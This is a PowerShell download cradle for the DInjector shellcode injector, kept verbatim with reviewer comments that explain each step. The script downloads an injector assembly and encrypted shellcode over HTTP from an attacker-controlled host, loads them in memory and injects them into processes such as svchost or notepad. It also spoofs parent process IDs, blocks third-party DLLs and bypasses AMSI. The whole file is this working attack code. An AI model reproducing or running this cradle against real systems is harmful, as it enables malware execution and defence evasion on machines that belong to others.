# DInjector download cradle (kept verbatim; comments added for review).
# What the lines below do, in order: build a command line from the settings
# $A..$K, fetch the injector assembly over plain HTTP with Invoke-WebRequest,
# load it straight from the response bytes with Assembly::Load, then call the
# non-public static method DInjector.Detonator.Boom with that command line
# split on spaces. The cleartext HTTP download, the in-memory assembly load
# and the hidden Start-Process are the observable behaviours of this script.
# module name
$A = "currentthread"
# lhost
$B = "10.10.13.37"
# lport
$C = 80
# injector filename
$D = "DInjector.dll"
# encrypted shellcode filename
$E = "enc"
# password to decrypt the shellcode (sent as a plain command-line argument below)
$F = "Passw0rd!"
# path to the image of a newly spawned process to inject into (used in "remotethreadapc", "remotethreadcontext" and "processhollow")
$G = "C:\Windows\System32\svchost.exe"
# process image name to inject into (used in "remotethread" and "remotethreadsuspended");
# note the block further down launches a new hidden instance of it and replaces $H with that instance's PID
$H = "notepad"
# parent process name to spoof the original value (use "0" to disable PPID spoofing)
$I = "explorer"
# block 3rd-party DLLs ("True" / "False")
$J = "True"
# bypass AMSI ("True" / "False")
$K = "True"
# --------------------------------------------------------------------
# For these two modules $H is turned from an image name into a PID by starting
# a hidden process of that name and reading its Id.
$methods = @("remotethread", "remotethreadsuspended")
if ($methods.Contains($A)) {
$H = (Start-Process -WindowStyle Hidden -PassThru $H).Id
}
# For these three modules $I is turned from a process name into the PID of a
# running instance; if Get-Process fails, $I becomes 0, which the setting above
# documents as "PPID spoofing disabled".
$methods = @("remotethreadapc", "remotethreadcontext", "processhollow")
if ($methods.Contains($A)) {
try {
$I = (Get-Process $I -ErrorAction Stop).Id
}
catch {
$I = 0
}
}
# Command line handed to the injector. It is split on single spaces below, so
# any value containing a space would be split into extra arguments.
$cmd = "${A} /sc:http://${B}:${C}/${E} /password:${F} /image:${G} /pid:${H} /ppid:${I} /blockDlls:${J} /am51:${K}"
# IWR is the built-in alias for Invoke-WebRequest; .Content holds the raw
# assembly bytes. The transfer is plain HTTP and nothing here verifies what
# was downloaded before it is loaded.
$data = (IWR -UseBasicParsing "http://${B}:${C}/${D}").Content
# Loads the assembly from the in-memory byte array; this script writes no file.
$assem = [System.Reflection.Assembly]::Load($data)
# Reflection with NonPublic|Static to reach a type and method that are not
# part of the assembly's public surface.
$flags = [Reflection.BindingFlags] "NonPublic,Static"
$class = $assem.GetType("DInjector.Detonator", $flags)
$entry = $class.GetMethod("Boom", $flags)
# The leading comma wraps the string[] from Split in a one-element array so
# Invoke receives it as a single argument (the method's args parameter).
$entry.Invoke($null, (, $cmd.Split(" ")))